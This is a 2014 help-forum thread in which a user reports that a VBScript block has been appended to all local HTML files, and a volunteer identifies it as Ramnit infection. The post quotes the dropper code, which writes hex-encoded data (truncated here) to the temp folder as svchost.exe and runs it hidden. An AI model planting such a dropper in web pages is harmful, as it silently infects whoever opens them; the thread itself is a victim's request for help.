Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

All Html files get injected by VBscript svchost


  • Please log in to reply
1 reply to this topic

#1 jsutbee

jsutbee

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:05:27 PM

Posted 31 July 2014 - 01:53 AM

Well I am seeking  help as  having a very bad week as i'm infected and don't know by what.I think it all happened after i browse and used few serial and keygen cracking site which i was using to crack few data recovery software and i suddenly felt that im infected after using it.  After checking my files and system found my all html files get the  injected by script like

 

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B1 ............................................................................................................................................................................................................................................................................................................

....................................

....................................

and at end of file 
 

Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--®JIô=_Q­N¯¨H6vlÕ¬^Bíx9e±f›ànþvѸgU=§¡,«A˜$­˜pÜpÊ.mõ•µ@`ºOT&Fú!%ãL|‹¼-{qöúÓ"©€A5sµ¼&ïòð;7cìAoOj@•²¾äî¤M[÷/Øg€ã«¥¤ü¾'vÞ¦XÑÆ™Kõ¿€÷û’´‘(‚x)r!x49²0€¤øщ†rÔ7bŠ¦]VåÓÍà¢7¦ƒæ_ò&½nà«yq艛œî2:l†7u|Ѐ¡HO~€}a¶tÕb}¼õë9lJ¬°a=x}õìPëÚÎÆÂT›úØORýF?±HMcÉ¡iñ‚ ZYK‹|§|lªyø9̇÷´6Àjš.e9’˜‘Ûj¿ÒR ±ÖFPC
 
with strange encoding got appended.

well Im a web developer and have lots of html files in my local wamp server. All php files seems ok. 
Im seeking a help @bleepingcomputer 

 

Edited by jsutbee, 31 July 2014 - 04:09 AM.


BC AdBot (Login to Remove)

 


m

#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:42 PM

Posted 31 July 2014 - 02:18 AM

Hi there and welcome.

Please go ahead and ask for support in the security forums.
But it seems that by using those cracks and keygens you've earned yourself a clean re-install . Because this is Ramnit.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users